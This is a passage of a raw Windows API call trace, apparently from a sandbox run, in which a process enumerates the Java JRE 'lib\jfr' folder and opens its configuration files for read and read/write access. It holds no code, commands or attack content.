out: hHeap=0x20000) returned 1 [0097.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0097.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0097.264] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.264] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.264] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.264] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0097.264] AreFileApisANSI () returned 1 [0097.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr", lpUsedDefaultChar=0x0) returned 43 [0097.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.264] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.264] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0097.264] AreFileApisANSI () returned 1 [0097.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0097.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x678a0 [0097.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x678a0, cchWideChar=43 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr") returned 43 [0097.264] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.264] GetLastError () returned 0x5 [0097.264] GetLastError () returned 0x5 [0097.265] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.265] GetLastError () returned 0x5 [0097.265] GetLastError () returned 0x5 [0097.265] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.265] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.265] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.265] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0097.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0097.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0097.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0097.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0097.265] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x88dc5, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jfr.jar", cAlternateFileName="")) returned 1 [0097.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0097.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0097.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0097.265] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78190 [0097.266] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa1295634, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.266] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e8d, dwReserved0=0x0, dwReserved1=0x0, cFileName="default.jfc", cAlternateFileName="")) returned 1 [0097.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0097.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0097.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0097.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0097.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0097.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0097.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0097.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0097.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0097.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0097.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0097.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a530 [0097.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0097.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0097.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0097.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0097.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.267] AreFileApisANSI () returned 1 [0097.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc", lpUsedDefaultChar=0x0) returned 55 [0097.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0097.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0097.267] AreFileApisANSI () returned 1 [0097.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0097.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75d50 [0097.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc") returned 55 [0097.268] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\default.jfc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.268] GetFileType (hFile=0x33c) returned 0x1 [0097.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0097.268] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.268] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.268] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.268] CloseHandle (hObject=0x33c) returned 1 [0097.269] AreFileApisANSI () returned 1 [0097.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0097.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76188 [0097.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc") returned 55 [0097.269] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\default.jfc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.269] GetFileType (hFile=0x33c) returned 0x1 [0097.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0097.269] CloseHandle (hObject=0x33c) returned 1 [0097.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.270] AreFileApisANSI () returned 1 [0097.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0097.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76098 [0097.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x76098, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc") returned 55 [0097.270] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\default.jfc"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e8d)) returned 1 [0097.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0097.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0097.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0097.270] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.270] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.270] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e61, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="profile.jfc", cAlternateFileName="")) returned 1 [0097.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0097.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0097.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0097.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0097.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0097.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a2d0 [0097.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0097.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0097.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0097.271] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.271] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.271] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.271] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0097.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.271] AreFileApisANSI () returned 1 [0097.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc", lpUsedDefaultChar=0x0) returned 55 [0097.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0097.271] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.271] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0097.272] AreFileApisANSI () returned 1 [0097.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0097.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75c60 [0097.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x75c60, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc") returned 55 [0097.272] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\profile.jfc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, 